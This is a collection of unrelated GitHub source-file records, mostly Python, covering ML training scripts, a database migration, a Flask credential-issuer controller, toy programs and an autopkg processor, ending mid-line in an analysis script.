#環境によって変える。kind_of_dataのディレクトリ\n data_path = f\"/content/drive/MyDrive/Colab Notebooks/new_data2/\" + dataname + \"/\"\n features = np.loadtxt(data_path+\"data.csv\", delimiter=',')\n labels = np.loadtxt(data_path+\"target.csv\", delimiter=',',dtype = float)\n if dataname in ['mirflickr', 'music_emotion', 'music_style','YeastBP']:\n plabels = np.loadtxt(data_path+\"cand/0.csv\", delimiter=',',dtype = float)\n else:\n plabels = np.loadtxt(data_path+\"cand/\"+str(p_noise)+\".csv\", delimiter=',',dtype = float)\n cv_inds = np.loadtxt(data_path+\"index/5-cv.csv\",delimiter=',',dtype = int)-1\n\n features_num = features.shape[1]\n labels_num = labels.shape[1]\n\n #全体の特徴をtensorに変換\n features = torch.tensor(features, dtype=torch.float)\n labels = torch.tensor(labels, dtype=torch.float)\n plabels = torch.tensor(plabels, dtype=torch.float)\n\n zeros = torch.zeros_like(labels)\n labels = torch.where(labels == -1, zeros, labels)\n plabels = torch.where(plabels == -1, zeros, plabels)\n\n #訓練とテストに分割(自分は5分割交差検証)\n # split training into train and test set\n \"\"\"n = len(features)\n train_size = int(n * prec)\"\"\"\n \n #trainとtestのインデックス(自分はcv_inds)\n \"\"\"indices = torch.randperm(n)\n train_idxs = indices[:train_size]\n test_idxs = indices[train_size:]\"\"\"\n index = np.where(cv_inds!=cv_num)\n index = np.ravel(index[0])\n train_idxs = torch.tensor(index)\n index = np.where(cv_inds==cv_num)\n index = np.ravel(index[0])\n test_idxs = torch.tensor(index)\n\n #上で指定したインデックスでtrainとtestに分ける \n train_features = torch.index_select(features, 0, train_idxs)\n train_labels = torch.index_select(labels, 0, train_idxs)\n plabels = torch.index_select(plabels, 0, train_idxs)\n\n clean_features = train_features.clone()\n clean_labels = train_labels.clone()\n\n noisy_features = train_features.clone()\n noisy_labels = plabels.clone()\n\n test_features = torch.index_select(features, 0, test_idxs)\n test_labels = torch.index_select(labels, 0, test_idxs)\n\n #検証集合を作る\n # select a clean batch from training set\n n = len(train_features)\n # meta_size = batch_size\n indices = torch.randperm(n)\n\n meta_size = int(n * p_true / 100)\n\n meta_idxs = indices[:meta_size]\n train_idxs = indices[meta_size:]\n\n meta_features = torch.index_select(train_features, 0, meta_idxs)\n meta_labels = torch.index_select(train_labels, 0, meta_idxs)\n\n train_features = torch.index_select(train_features, 0, train_idxs)\n train_labels = torch.index_select(plabels, 0, train_idxs)\n\n train_dataset = TensorDataset(train_features, train_labels)\n test_dataset = TensorDataset(test_features, test_labels)\n meta_dataset = TensorDataset(meta_features, meta_labels)\n clean_dataset = TensorDataset(clean_features, clean_labels)\n noisy_dataset = TensorDataset(noisy_features, noisy_labels)\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(dataset=test_dataset, batch_size=test_features.size()[0], shuffle=False)\n meta_loader = DataLoader(dataset=meta_dataset, batch_size=batch_size, shuffle=True)\n clean_loader = DataLoader(dataset=clean_dataset, batch_size=batch_size, shuffle=True)\n noisy_loader = DataLoader(dataset=noisy_dataset, batch_size=batch_size, shuffle=True)\n\n return train_loader, test_loader, meta_loader, clean_loader, noisy_loader, features_num, labels_num","repo_name":"HaruhiMizuguchi/PMLVD_expansion","sub_path":"function/PML-MD/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14447279462","text":"import gym\n\nimport os,sys\nsys.path.append(os.path.abspath(os.getcwd()))\n\nimport baselines.gpg.gym_formation.gym_flock\nimport numpy as np\nimport torch.optim as optim\n\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom baselines.gpg.rl_formation.make_g import build_graph\nfrom baselines.gpg.rl_formation.policy import Net\nfrom baselines.gpg.rl_formation.make_g import build_graph\nfrom baselines.gpg.rl_formation.utils import select_action, update_policy\n\nimport os\nimport datetime\n\npolicy = Net()\noptimizer = optim.Adam(policy.parameters(), lr=1e-3)\nenv = gym.make('FormationFlying-v3')\n\nif not os.path.exists('./logs'):\n\tos.makedirs('./logs')\n\nfilename = str(datetime.datetime.now())+str('_%dagents_fixed_fcnpolicy'%env.n_agents)\nfilename = filename+str('.pt')\ntorch.save(policy.state_dict(),'./logs/%s'%filename)\n\ndef main(episodes):\n\trunning_reward = 10\n\tplotting_rew = []\n\n\tfor episode in range(episodes):\n\t\treward_over_eps = []\n\t\tstate = env.reset() # Reset environment and record the starting state\n\t\tg = build_graph(env)\n\t\tdone = False\n\n\t\tfor time in range(200):\n\n\t\t\t#if episode%50==0:\n\t\t\t#\tenv.render()\n\t\t\t#g = build_graph(env)\n\t\t\taction = select_action(state,g,policy)\n\n\t\t\taction = action.numpy()\t# shape [num_agents, action_dim]\n\t\t\taction = np.reshape(action,[-1])\n\n\t\t\t# Step through environment using chosen action\n\t\t\taction = np.clip(action,-env.max_accel,env.max_accel)\n\n\t\t\tstate, reward, done, _ = env.step(action)\n\t\t\t# state.shape = [num_agents, state_dim]\n\n\t\t\treward_over_eps.append(reward)\n\t\t\t# Save reward\n\t\t\tpolicy.reward_episode.append(reward)\n\t\t\tif done:\n\t\t\t\tbreak\n\n\t\t# Used to determine when the environment is solved.\n\t\trunning_reward = (running_reward * 0.99) + (time * 0.01)\n\n\t\tupdate_policy(policy,optimizer)\n\n\t\tif episode % 50 == 0:\n\t\t\tprint(f'Episode {episode}\\t ' \\\n\t\t\t\tf'Last length: {time:5d}\\t ' \\\n\t\t\t\tf'Average running reward: {running_reward:.2f}\\t ' \\\n\t\t\t\tf'Average reward over episode: {np.mean(reward_over_eps):.2f}')\n\n\t\tif episode % 5000 == 0 :\n\t\t\ttorch.save(policy.state_dict(),'./logs/%s'%filename)\n\n\n\t\tplotting_rew.append(np.mean(reward_over_eps))\n\tnp.savetxt('Relative_Goal_Reaching_for_%d_agents_rs_rg.txt' %(env.n_agents), plotting_rew)\n\tfig = plt.figure()\n\tx = np.linspace(0,len(plotting_rew),len(plotting_rew))\n\tplt.plot(x,plotting_rew)\n\tplt.savefig('Relative_Goal_Reaching_for_%d_agents_rs_rg.png' %(env.n_agents))\n\tplt.show()\n\n\nepisodes = 50000\nmain(episodes)","repo_name":"nsidn98/InforMARL","sub_path":"baselines/gpg/rl_formation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"85"} +{"seq_id":"19821778238","text":"# pylint: skip-file\n\"\"\"us_mi_incarceration_admission_reasons\n\nRevision ID: d449b1d3714e\nRevises: fd946cbe3966\nCreate Date: 2022-10-05 14:53:59.777758\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d449b1d3714e\"\ndown_revision = \"8c74c471901a\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.execute(\n \"\"\"\n UPDATE state_incarceration_period\n SET admission_reason = 'REVOCATION'\n WHERE admission_reason_raw_text in ('11', '12', '14', '15')\n AND state_code = 'US_MI'\n \"\"\"\n )\n\n\ndef downgrade() -> None:\n op.execute(\n \"\"\"\n UPDATE state_incarceration_period\n SET admission_reason = 'NEW_ADMISSION'\n WHERE admission_reason_raw_text in ('11', '12', '14', '15')\n AND state_code = 'US_MI'\n \"\"\"\n )\n","repo_name":"Recidiviz/pulse-data","sub_path":"recidiviz/persistence/database/migrations/state/versions/2022_10_05_1453_d449b1d3714e_us_mi_incarceration_admission_reasons.py","file_name":"2022_10_05_1453_d449b1d3714e_us_mi_incarceration_admission_reasons.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"85"} +{"seq_id":"5988498970","text":"import random\nmy_id = \"20101344\"\nif my_id[3] == 0:\n amountOfShuffle = 8\nmini = int(my_id[4])\nwin = 44 \nmaxi = int(win*1.5)\n\n\n\ndef minimax(depth, nodeIndex, maximizingPlayer,\n\t\t\tvalues, alpha, beta):\n\n\t# Terminating condition. i.e\n\t# leaf node is reached\n\tif depth == 3:\n\t\treturn values[nodeIndex]\n\n\tif maximizingPlayer is False:\n\t\tans = 1000000000000000000000000000000000000\n\t\tfor i in range(2):\n\t\t\n\t\t\tval = minimax(depth + 1, nodeIndex * 2 + i,\n\t\t\t\t\t\t\tTrue, values, alpha, beta)\n\t\t\tans = min(ans, val)\n\t\t\tbeta = min(beta, ans)\n\n\t\t\t# Alpha Beta Pruning\n\t\t\tif beta <= alpha:\n\t\t\t\tbreak\n\t\t\n\t\treturn ans\n\t\n\telse:\n\t\tans = -1000000000000000000000000000000000000\n\n\t\t# Recur for left and right children\n\t\tfor i in range(2):\n\t\t\t\n\t\t\tval = minimax(depth + 1, nodeIndex * 2 + i,\n\t\t\t\t\t\tFalse, values, alpha, beta)\n\t\t\tans = max(ans, val)\n\t\t\talpha = max(alpha, ans)\n\n\t\t\t# Alpha Beta Pruning\n\t\t\tif beta <= alpha:\n\t\t\t\tbreak\n\t\t\n\t\treturn ans\n\n\t\n\n#eikhane change korbi, eigula shob output er.. #min = minimum num, max = maximum number, win= joto lagbey jitar jonne, shuffle_no = 8, 2nd tay lagbey\n\nprint(\"The optimal value is :\", minimax(0, 0, True, random.sample(range(mini, maxi), 8), -1000000000000000000000000000000000000, 1000000000000000000000000000000000000))\n\t\n\n","repo_name":"ShakChunni/CSE_lab","sub_path":"CSE422(AI)/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"44241084528","text":"import time \n\nprint(\"\\n ==========ATM MACHINE of MSCETI ===============\")\nprint(\"1. Check Balance \")\nprint(\"2. Withdraw Balance \")\nprint(\"3. Deposit Balance \")\nprint(\"4. Exit \")\n\nbalance = 10000\nwhile True:\n user_data = int(input(\"Enter Your choice (1/2/3/4/) \"))\n if user_data == 1:\n print(f\"Your Current Balance is {balance}\")\n time.sleep(2)\n elif user_data ==2:\n amount = float(input(\"Enter the amount to withdraw: ₹\"))\n if amount > balance:\n print(\"Insufficient balance.\")\n else:\n balance -= amount\n print(f\"Withdrawn ₹{amount:.2f}. Your remaining balance is ₹{balance:.2f}.\")\n elif user_data ==3:\n amount = float(input(\"Enter the amount to deposit: ₹\"))\n balance += amount\n print(f\"Deposited ₹{amount:.2f}. Your new balance is ₹{balance:.2f}.\") \n elif user_data == 4:\n print(\"Thank you for using our ATM. Have a great day!\")\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n \n\n","repo_name":"samonfire-adm/pythontuts1-","sub_path":"miniProject/project 1/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"34125804816","text":"from fastapi import UploadFile\nimport pandas, io\nfrom typing import List\n\nfrom fastapi.encoders import jsonable_encoder\nfrom pandas._libs.tslibs import NaT\nfrom sqlalchemy.orm import Session\n\nfrom crud.base import CRUDBase\nfrom models.asset import Asset\nfrom schemas.asset import AssetCreate, AssetUpdate\n\n\nclass CRUDAsset(CRUDBase[Asset, AssetCreate, AssetUpdate]):\n def create_with_item(\n self, db: Session, *, obj_in: AssetCreate, item_id: int\n ) -> Asset:\n obj_in_data = jsonable_encoder(obj_in)\n db_obj = self.model(**obj_in_data, item_id=item_id)\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n db_obj.order = float(db_obj.id)\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def get_multi_by_item(\n self,\n db: Session,\n *,\n item_id: int,\n skip: int = 0,\n # limit: int = 100\n ) -> List[Asset]:\n return (\n db.query(self.model)\n .filter(Asset.item_id == item_id)\n .offset(skip)\n # .limit(limit)\n .all()\n )\n\nasset = CRUDAsset(Asset)\n","repo_name":"firstArachne0116/product-qr-backend","sub_path":"app/app/crud/crud_asset.py","file_name":"crud_asset.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5307606245","text":"import yaml\n\n\nclass SettingManager:\n\n def __init__(self):\n _settings = self.__file_load()\n self.common = _settings['app']['common']\n self.users = _settings['app']['users']\n\n def __file_load(self) -> dict:\n with open('setting.yml', encoding='utf-8') as f:\n _settings = yaml.load(f)\n return _settings\n","repo_name":"shiva768/imap-mail-watcher","sub_path":"setting_manager.py","file_name":"setting_manager.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14915761792","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\nfrom sklearn.svm import SVC #support vector machine\r\nfrom sklearn.naive_bayes import GaussianNB #Gauss\r\nfrom sklearn.linear_model import LogisticRegression #Logistic Regression\r\nfrom sklearn.datasets import load_breast_cancer\r\n\r\nmachines = {\r\n \"SVC\":SVC(kernel=\"linear\"),\r\n \"Gauss\":GaussianNB(),\r\n \"LR\":LogisticRegression(solver=\"liblinear\")\r\n}\r\n\r\ndef main():\r\n dataset = load_breast_cancer()\r\n X = dataset.data\r\n Y = dataset.target\r\n x_train, x_test, y_train, y_test = train_test_split(X,Y,test_size=0.2,random_state=0)\r\n scores = {}\r\n for m in machines:\r\n print(\"running machine:\",m)\r\n machines[m].fit(x_train,y_train)\r\n y_pred = machines[m].predict(x_test)\r\n score = metrics.accuracy_score(y_test,y_pred)\r\n scores[m] = score\r\n print(\"score:\",score)\r\n print(\"confusion matrix:\\n\",metrics.confusion_matrix(y_test,y_pred))\r\n print(\"\\n\")\r\n return scores\r\n\r\nmain()","repo_name":"MachineLearningUCG2019/MachineLearning","sub_path":"greg_code/compare_machine.py","file_name":"compare_machine.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"42352623824","text":"#!/usr/bin/python\n\nimport json\nimport urllib2\n\nfrom autopkglib import Processor, ProcessorError\n\n__all__ = [\"GenymotionURLProvider\"]\n\nclass GenymotionURLProvider(Processor):\n\tdecription = (\"Uses Genymotion API to find the latest version of application.\")\n\tinput_variables = {\n\t}\n\toutput_variables = {\n\t\t'genymotion_version': {\n\t\t\t'description': 'Version number',\n\t\t}\n\t}\n\n\tdescription = __doc__\n\n\tdef get_version(self):\n\t\t# Genymotion Update API\n\t\turl = 'https://cloud.genymotion.com/launchpad/last_version/mac/x64/'\n\t\t# API requires AJAX / XMLHttpRequest\n\t\theaders = {'X-Requested-With' :'XMLHttpRequest'}\n\t\ttry:\n\t\t\trequest = urllib2.Request(url, headers=headers)\n\t\t\tresponse = urllib2.urlopen(request)\n\t\t\t# Convert response to JSON\n\t\t\tjsondata = json.loads(response.read())\n\t\t\t# Example json return - {u'url': u'http://files2.genymotion.com/genymotion/genymotion-2.7.2/genymotion-2.7.2.dmg', u'version': u'2.7.2'}\n\t\t\treturn jsondata['version']\n\t\texcept:\n\t\t\traise ProcessorError('Could not retrieve version from URL: %s' % url)\n\n\tdef main(self):\n\t\tself.env['genymotion_version'] = self.get_version()\n\t\tself.output('Version: %s' % self.env['genymotion_version'])\n\nif __name__ == '__main__':\n\tprocessor = GenymotionURLProvider()\n\tprocessor.execute_shell()\n","repo_name":"natewalck/erikng-recipes","sub_path":"Genymobile/GenymotionURLProvider.py","file_name":"GenymotionURLProvider.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30170587607","text":"from .client import DuelBot, Duel\nfrom .ability import Ability\n\n__title__ = \"codeduels\"\n__version__ = \"0.0.1a\"\n__description__ = \"Facebook Chat (Messenger) for Python\"\n\n__author__ = \"Adam McArthur\"\n__email__ = \"adam@mcaq.me\"\n\n__all__ = [\"DuelBot\", \"Ability\", \"Duel\"]\n","repo_name":"Sharpz7-Archives/codeduels","sub_path":"codeduel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"30029731058","text":"# Given a string A denoting an expression. It contains the following operators '+', '-', '*', '/'.\r\n# Check whether A has redundant braces or not.\r\n# NOTE: A will be always a valid expression.\r\n# 1 <= |A| <= 10^5\r\n# Return 1 if A has redundant braces, else return 0.\r\ndef redundantBraces(A):\r\n stack = []\r\n\r\n for ch in A:\r\n if ch == ')':\r\n top = stack[-1]\r\n stack.pop()\r\n\r\n flag = True\r\n\r\n while top != '(':\r\n if top == '+' or top == '-' or top == '*' or top == '/':\r\n flag = False\r\n\r\n top = stack[-1]\r\n stack.pop()\r\n\r\n if flag:\r\n return 1\r\n\r\n else:\r\n stack.append(ch)\r\n\r\n return 0\r\n\r\n\r\nprint(redundantBraces(\"((a+b))\")) # 1\r\nprint(redundantBraces(\"(a+(a+b))\")) # 0\r\n","repo_name":"deysantanu84/python-portfolio","sub_path":"problemSolving/stacks/redundantBraces.py","file_name":"redundantBraces.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18853246426","text":"\"\"\"\nOneCycle Learning Rate Scheduler\nDan Mezhiborsky - @dmezh\nSee:\nhttps://github.com/dmezh/convmixer-tf\nhttps://github.com/tmp-iclr/convmixer/issues/11#issuecomment-951947395\n\"\"\"\n\nimport numpy as np\nfrom tensorflow import keras\n\n\nclass OneCycleLRScheduler(keras.callbacks.Callback):\n def __init__(self, epoch_count, lr_max, batches_per_epoch):\n super().__init__()\n self.epoch_count = epoch_count\n self.epoch = 1\n self.lr_max = lr_max\n self.batches_per_epoch = batches_per_epoch\n\n def on_batch_begin(self, batch: int, logs=None):\n self.batch = batch\n self.t = self.epoch + (self.batch + 1) / self.batches_per_epoch\n sched = np.interp(\n [self.t],\n [0, self.epoch_count * 2 // 5,\n self.epoch_count * 4 // 5, self.epoch_count],\n [0, self.lr_max, self.lr_max / 20.0, 0],\n )[0]\n keras.backend.set_value(self.model.optimizer.lr, sched)\n\n def on_epoch_begin(self, epoch: int, logs=None):\n epoch = epoch + 1 # tensorflow is off-by-one :P\n self.epoch = epoch\n print(\n f\"lr at epoch {epoch}: {keras.backend.get_value(self.model.optimizer.lr)}\"\n )\n","repo_name":"kuantuna/SPDPvCNN","sub_path":"architectures/helpers/one_cycle.py","file_name":"one_cycle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"2568637582","text":"#!/usr/bin/env python\nfrom flask import Flask, jsonify, abort, request, make_response\n\nimport requests\nimport json\nimport os\nimport time\nimport yaml\nimport config\nimport issuer\n\n# Load application settings (environment)\nconfig_root = os.environ.get('CONFIG_ROOT', '../config')\nENV = config.load_settings(config_root=config_root)\n\nclass BCRegController(Flask):\n def __init__(self):\n print(\"Initializing \" + __name__ + \" ...\")\n super().__init__(__name__)\n issuer.startup_init(ENV)\n\napp = BCRegController()\nwsgi_app = app.wsgi_app\n\n@app.route('/health', methods=['GET'])\ndef health_check():\n if issuer.tob_connection_synced():\n return make_response(jsonify({'success': True}), 200)\n else:\n abort(503, \"Connection not yet synced\")\n\n@app.route('/status/reset', methods=['GET'])\ndef clear_status():\n issuer.clear_stats()\n return make_response(jsonify({'success': True}), 200)\n\n@app.route('/status', methods=['GET'])\ndef get_status():\n return make_response(jsonify(issuer.get_stats()), 200)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n@app.route('/issue-credential', methods=['POST'])\ndef submit_credential():\n \"\"\"\n Exposed method to proxy credential issuance requests.\n \"\"\"\n if not issuer.tob_connection_synced():\n abort(503, \"Connection not yet synced\")\n\n start_time = time.perf_counter()\n method = 'submit_credential.batch'\n\n if not request.json:\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400)\n\n cred_input = request.json\n\n response = issuer.handle_send_credential(cred_input)\n\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, True)\n\n return response\n\n\n@app.route('/api/agentcb/topic//', methods=['POST'])\ndef agent_callback(topic):\n \"\"\"\n Main callback for aries agent. Dispatches calls based on the supplied topic.\n \"\"\"\n start_time = time.perf_counter()\n method = 'agent_callback.' + topic\n\n if not request.json:\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400)\n\n message = request.json\n\n # dispatch based on the topic type\n if topic == issuer.TOPIC_CONNECTIONS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_connections(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_CONNECTIONS_ACTIVITY:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_CREDENTIALS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_credentials(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_PRESENTATIONS:\n if \"state\" in message:\n method = method + '.' + message[\"state\"]\n response = issuer.handle_presentations(message[\"state\"], message)\n else:\n response = jsonify({})\n\n elif topic == issuer.TOPIC_GET_ACTIVE_MENU:\n response = issuer.handle_get_active_menu(message)\n\n elif topic == issuer.TOPIC_PERFORM_MENU_ACTION:\n response = issuer.handle_perform_menu_action(message)\n\n elif topic == issuer.TOPIC_ISSUER_REGISTRATION:\n response = issuer.handle_register_issuer(message)\n \n elif topic == issuer.TOPIC_PROBLEM_REPORT:\n response = issuer.handle_problem_report(message)\n\n else:\n print(\"Callback: topic=\", topic, \", message=\", message)\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, False)\n abort(400, {'message': 'Invalid topic: ' + topic})\n\n end_time = time.perf_counter()\n issuer.log_timing_method(method, start_time, end_time, True)\n\n return response\n","repo_name":"bcgov/von-oil-gas-poc","sub_path":"issuer_controller/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23574072695","text":"# 18-842 Distributed Systems // Spring 2016.\n# Multegula - A P2P block breaking game.\n# MenuScreen.py.\n# Team Misfits // amahmoud. ddsantor. gmmiller. lunwenh.\n\n# imports\nfrom UI.typedefs import *\n\n# Menu Screen - buttons will be superimpsed on top of this screen to allow the user to\n# either start a solo game or join a network game.\nclass MenuScreen :\n ### __init__ - initialize and return a MenuScreen\n def __init__(self) :\n self.firstBack = True\n self.firstText = True\n\n ### setBackground - set the background in the canvsa\n def setBackground(self, canvas) :\n self.background = canvas.create_rectangle(0, 0, CANVAS_WIDTH, CANVAS_HEIGHT, fill = 'black', width = 0)\n\n self.foreground = canvas.create_rectangle(X_MARGIN, Y_MARGIN, CANVAS_WIDTH - X_MARGIN,\n CANVAS_HEIGHT - Y_MARGIN, fill = 'white', width = 0)\n\n ### setText - set the text in the canvas\n def setText(self, canvas) :\n self.title = canvas.create_text(X_CENTER, Y_LOC_TITLE, text = 'MULTEGULA',\n font = ('Courier', XL_TEXT_SIZE))\n\n self.t1 = canvas.create_text(X_CENTER, Y_LOC_AUTHOR1, text = 'created by',\n font = ('Courier', M_TEXT_SIZE))\n\n self.t2 = canvas.create_text(X_CENTER, Y_LOC_AUTHOR2, text = 'DS Team Misfits',\n font = ('Courier', M_TEXT_SIZE))\n\n ### drawBackground - manages drawing of the background\n def drawBackground(self, canvas) :\n if(self.firstBack) :\n self.setBackground(canvas)\n self.firstBack = False\n\n ### drawText - manages drawing of the text\n def drawText(self, canvas) :\n if(not(self.firstText)) :\n canvas.delete(self.title)\n canvas.delete(self.t1)\n canvas.delete(self.t2)\n self.setText(canvas)\n else :\n self.setText(canvas)\n self.firstText = False\n\n","repo_name":"arminm/multegula","sub_path":"UI/components/screens/MenuScreen.py","file_name":"MenuScreen.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"42806666234","text":"# -*- coding: utf-8 -*-\n\"\"\"\n거스름돈 : https://programmers.co.kr/learn/courses/30/lessons/12907?language=python3\n\"\"\"\n\nanswer = 0\ndef solution(n, money):\n if n == 0: return 1\n money.reverse()\n l = len(money)\n\n def DFS(L, s, i):\n global answer\n if s > n:\n return\n if s == n:\n answer = answer + 1\n # print(f'L = {L}, s = {s}, answer = {answer}')\n return\n for _i in range(i, l):\n DFS(L+1, s+money[_i], _i)\n\n DFS(0, 0, 0)\n\n return answer\n\n\nif __name__ == '__main__':\n result = solution(5, [1, 2, 5])\n print(f'result = {result}')\n assert result == 4\n\n","repo_name":"junjongwook/programmers","sub_path":"Skill Check/Level3/s12907_2.py","file_name":"s12907_2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24439426864","text":"class Solution:\n def pivotIndex(self, nums: List[int]) -> int:\n leftSum = 0 #keep track of the sum on the left side\n rightSum = sum(nums) #keep track of the sum on the right side\n for i in range(len(nums)):\n rightSum -= nums[i] #subtract this number from the right\n if leftSum == rightSum: #if the sums on the left and the right are equal\n return i #we found the pivot!\n leftSum += nums[i] #add this number to the left\n return -1\n \n ","repo_name":"Bloomh/LeetCode-Submissions","sub_path":"724-find-pivot-index/724-find-pivot-index.py","file_name":"724-find-pivot-index.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14577297922","text":"from sklearn.ensemble import GradientBoostingClassifier as GBDT\nimport pickle\nimport numpy as np\n\n\nif __name__ == \"__main__\":\n with open(\"VGG16_feature_dataset.pkl\", \"rb\") as f:\n p = pickle.load(f)\n train_x = p[\"train_conv_feature\"]\n test_x = p[\"test_conv_feature\"]\n train_y = np.asarray(np.argmax(p[\"train_label\"], axis=1), dtype=np.float32)\n test_y = np.asarray(np.argmax(p[\"test_label\"], axis=1), dtype=np.float32)\n clf = GBDT()\n print(train_x.shape, train_y.shape)\n clf.fit(train_x, train_y)\n print(np.mean(test_y == clf.predict(test_x)))\n\n","repo_name":"polarskie/yandeSpider","sub_path":"gbdt.py","file_name":"gbdt.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23461550067","text":"#!/usr/bin/env python\nimport subprocess\nfrom pathlib import Path\nfrom supersolids.scripts.cp_plots import cp_plots\n\n\ndef string_float(s):\n return s, float(s)\n\n\n# Script runs, if script is run as main script (called by python *.py)\nif __name__ == \"__main__\":\n # path_anchor_input = Path(\"/home/dsche/supersolids/results/jospeh_injunction/real_global/\")\n # path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_1.0/\")\n path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_0.1/\")\n # path_anchor_input = Path(\"/run/media/dsche/ITP Transfer/joseph_injunction2/y_kick/kick_0.01/\")\n\n frame_start = 1610000\n # frame_start = 1210000\n steps_per_npz = 1000\n # movie_start = 695\n # movie_end = 714\n # movie_start = 720\n # movie_end = 739\n movie_start = 745\n movie_end = 764\n\n dt = 0.0002\n\n dir_name = \"movie\"\n counting_format = \"%03d\"\n\n steps_format = \"%07d\"\n\n dir_suffix = \"_right\"\n\n file_suffix = \"_fft\"\n inbuild_func = \"fft_plot\"\n # inbuild_func = \"\"\n # func = \"lambda x, y: (x, y)\"\n func = \"\"\n\n property_filename_suffix = dir_suffix + file_suffix\n\n subplots = True\n property_func = True\n property_name = \"get_center_of_mass\"\n # property_name = \"get_parity\"\n # property_name = \"get_peak_distances_along\"\n # property_name = \"get_peak_positions\"\n # property_args = [0]\n # property_args = []\n\n # property_name = \"get_phase_var\"\n # property_args = [0, 256, 0, 128, 0, 32]\n property_args = [0, 128, 0, 128, 0, 32]\n # property_args = [128, 256, 0, 128, 0, 32]\n\n # property_name = \"get_phase_var_neighborhood\"\n # [prob_min, amount]\n # property_args = [0.02, 4]\n\n # we want 2S=D, so that the peaks distance equals the distance between max and min of sin\n # delta = s * 2.0\n\n for i in range(movie_start, movie_end + 1):\n command = [\"python\", \"-m\", \"supersolids.tools.track_property\"]\n flags = [f\"-dt={dt}\",\n f\"-dir_path={path_anchor_input}\",\n f\"-dir_name={dir_name}{counting_format % i}\",\n f\"-frame_start={frame_start}\",\n f\"-steps_per_npz={steps_per_npz}\",\n f\"-steps_format={steps_format}\",\n f\"-property_name={property_name}\",\n f\"-property_filename_suffix={property_filename_suffix}\"]\n\n if property_func:\n flags.append(\"--property_func\")\n if property_args:\n property_args_parsed = list(map(str, property_args))\n flags.append(f\"--property_args\")\n flags += property_args_parsed\n if subplots:\n flags.append(f\"--subplots\")\n if inbuild_func:\n flags.append(f\"-inbuild_func={inbuild_func}\")\n if func:\n flags.append(f\"-func={func}\")\n\n # command needs flags to be provided as list\n command.extend(flags)\n\n print(command)\n p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)\n\n # communicate needs flags to be provided as string seperated by \" \".\n flags_parsed = \" \".join(flags)\n out, err = p.communicate(flags_parsed.encode())\n print(f\"out:\\n{out}\\n\")\n print(f\"err:\\n{err}\\n\")\n\n # copy results from all movies into one directory (to compare them easier in image slideshows)\n path_anchor_output = Path(path_anchor_input, \"graphs\", property_name + dir_suffix)\n cp_plots(movie_start, (movie_end - movie_start) + 